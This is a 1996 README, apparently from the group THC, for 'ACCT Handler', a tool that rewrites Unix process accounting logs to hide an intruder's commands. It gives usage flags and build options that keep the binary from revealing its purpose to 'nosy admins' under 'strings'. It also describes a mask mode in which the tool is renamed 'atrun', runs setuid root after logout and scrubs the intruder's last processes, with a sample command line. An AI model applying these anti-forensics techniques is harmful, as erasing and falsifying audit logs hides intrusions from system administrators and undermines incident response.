 #### ACCT Handler v1.0 beta #### 
 #### By Zhart/THC  (c) 1996 #### 

Features: 
          - Fast handling of very large acct files.
          - Multiple levels of security for nosy admins 
              (passworded and "strings" proof).
          - Covers last commands before logout    [mask mode]
              (the program itself and the shell)
          - Works.
          
What does in 2 words:  (in case "ACCT Handler" doesn't tell you anything)
  Edits the process accounting file (tipically /var/adm/acct) changing 
  the given user_id to another one and removing the flags.


 [- Introduction -]

The program works in two modes: - from command line
                                - interactively
 
Here it is the command line help:

Usage: <progname> -u user -f user [-t time]/[-b] [-p command] [-h]
-u user_login     (necessary) User to hide
-f user_login     (necessary) User to fake
-t hh:mm dd/mm/yy (if not -b) Start editing from this date
-b                (if not -t) Start editing from file's beginning
-p command_name    (optional) Fake user only about this command
-m                 (optional) CountDown Mask mode
-h                            This help and exit
If NO arguments are given program acts in interactive mode

Arguments can be given in any order.
If none of "-t" and "-b" options is selected, program acts randomly.
If "-u" and/or "-f" options are not selected, program uses defaults defined
at compilation time.
If real and fake user are the same the effect will be that the SuperUser 
flags will be removed.
Command line mode is particularly useful for scripts;
at a later time (in next versions) I'll change date/time format to a more
standard one, to make using scripts easier.
(Being honest, you can do this by yourself, it isn't difficult; I swear.)


 [- The time facility -]
   
The first difference (and the most important) from other programs which 
handle acct logging is in the time option. The process accounting file,
which we will call ACCT, differs from others logging files for the speed
with which it grows, generally an ACCT is several Mbytes large, so keeping
such a file opened in write mode for a long time could lead to unpleasant 
surprises; mainly, it takes really too much time scanning an entire ACCT 
considering that is done in a multitasking enviroment; (consider that is 
simply unuseful to scan a file which starts 3-4 days ago when you want to 
cover commands of the last twenty minutes).
Here comes in help this feature:
  The program prints date and time of the first and last logs in the ACCT. 
  User fixes a time since start scanning/editing the file.
  Program, starting from the end of file, goes back through the file at a
   pre-defined number of steps a time (each step corresponds to the size 
   of an acct record), untill it finds a date minor than the selected one.
   This phase is done by using lseek so that it is very fast.
  After that, the program starts a second search, done by reading each 
  record, and stops when it finds the user-selected date.  
  At this point it starts the scanning/editing phase.

If the ACCT file is not very large, or if you want to intentionally edit it 
from the beginning, or you simply don't like this option, it is also 
possible to make the program work in normal mode starting scanning/editing 
from file's beginning.
By the command line this is done with the "-b" option; in interactive mode
you will be simply asked it just after the program has printed ACCT starting 
and ending dates.
At the moment,if you insert bad time/date, actions are random.
NOTE: The time option [obviously] has also the effect to select (approximately)
      the part of the acct file which must be edited... if you use an account 
      still used by others you can't change all of its entries in the acct 
      files, it will be noticed very soon!


 [- Security -]

The program features 3 different levels of security, depending on your 
paranoic tastes. 
The first level of (in-)security is using it as it is, so that everyone who 
will run it will probably understand what it is and could also ask for help 
using the "-h" option; so it's up to you, to keep the file out from other eyes.
A reasonable level of security (the second one) is set by compiling the 
program with:
#define PWD 1   
This will make the program wait for a password if started without arguments
and will simply exit if invoked with the "-h" option; both without giving
any message.
The password is stored in the "vWd()" procedure, if you can't find it or 
change it, turn off the computer and consider doing something more productive.
The third level  (which will probably be used in conjunction with the second)
is set by commenting (or simply deleting) this line:

#define SHOW    /* blah blah ... blah .. blah blah   blah blah  */

in this way:

/* #define SHOW     blah blah ... blah .. blah blah   blah blah  */

This way, the program will compile without strings which explicitly refer to 
evil things or to "acct" handling. This means that if someone does a:
# strings prog_name |more 
he doesn't find anything less than some strings about dates of a file.
For this purpose, also global variables and procedures have unsuspicious
names and the location of the ACCT file is stored with the same method of 
the program password, to make it "strings" proof.
This security enhancement has the consequence of a less user-friendly program
but really secure.
I've often found sysadmins who gave a look randomly at users' binaries 
with "strings" command so I don't really think its unuseful; it's your choice.


 [- Countdown Mask Mode -]

This feature really allows to act without leaving traces!
The problem with acct cleaning was always that the program couldn't mask 
itself and/or couldn't mask the commands that were closed right before 
logout (tipically the shell)
[as you should know, acct logs a command only when it has ended 
running, so if you run the cleaner and logoff, at least your shell and 
the cleaner will be logged].
My solution is this: 
  - Give to the "ACCT Handler" an unsuspicious name like "atrun"
  - use the "-m" mask flag from command line:

    # ./atrun -u evil -f good -t time -m > /dev/null &
    # logout

This way, the program will wait a defined time before starting editing 
the ACCT file, so that you can logout and your processes can terminate.
The program will clean *all* of your processes from the ACCT assigning 
them to another user and removing the SuperUser flags.  
It will only remain the process of the program itself which will appear 
like this:
atrun            S     root     __        132   0.33 secs Thu Oct 11 12:23:21
                      ^^^^^^  ^^^^^^
The process is assigned to root 'cause calling the program with the "-m" flag
makes it "setuid" to root. And the process has no tty as the real atrun 
'cause you logged off. 
As you can see this line is completely unsuspicious.
[If you are so paranoic that you want it to be placed far from your commands
you can add another "sleep(your_choice)" instruction in the main procedure,
after the ACCT file has been closed.]

The countdown time to wait before editing the file is set by this line:
#define COUNTD 20
and is expressed in seconds.


 [- Configuration -]

You must "#undef LINUX" or comment the "#define LINUX" line if you're 
compiling the program on a non-linux board.
Then you should verify that the acct file is in "/var/adm/acct", otherwise 
you have to change the string "filename" in the "main" procedure.

You can set the default user id's of the user you want to hide and of the user
you want to show, stored in the variables "u_uid" & "f_uid"; this will work
if "-f" and/or "-u" options are omitted while "-b" or "-t" are used.

You can set the number of steps the program uses in the fast-search phase by
defining the pre-processor variable STEPS:
#define STEPS 500
Choose it by experimenting and comparing the dates reported by the program 
(fast-search/slow-search) with the time taken to reach standard targets 
(it depends on ACCT_file's size). 
[ Beware that giving a starting time (when running the program) which is 
relatively close (it depends on STEPS) to file's beginning time could 
generate problems (tipically make the program exit without doing anything).
So, in this case, it's better (and more logical) to use the "beginning" 
option. ]

You can set the security options as explained in the Security section. 


 [- Last words -]

Testing & Feedback:

This program was basically tested on Linux ... some testing has been made on
Ultrix and System V ,so everything should go fine; if not, contact me and
tell me what was wrong (obviously with some detailed information about 
the problem and the OS).
Any kind of feedback is welcome expecially new ideas, strong critiques 
to my programming and injuries ...
At the moment no e-mail addresses are available, so for any contacts you
can reach me on LorE bbs +49-69-823282 ... Guest Account to leave 
messages: login:THC passwd:THC

Forthcoming:

   - Disassembling in text mode of an ACCT file for editing and reassembling.
   - Possibility of completely nuke records.
   
Greets/Thanks:

vanHauser:          Thanx for beta-testing  
The Foolish Group:  From "lupo" to everybody ....( ernesto, la mamma, la 
                      sorella ....)



This program was somehow inspired by "cloak2".


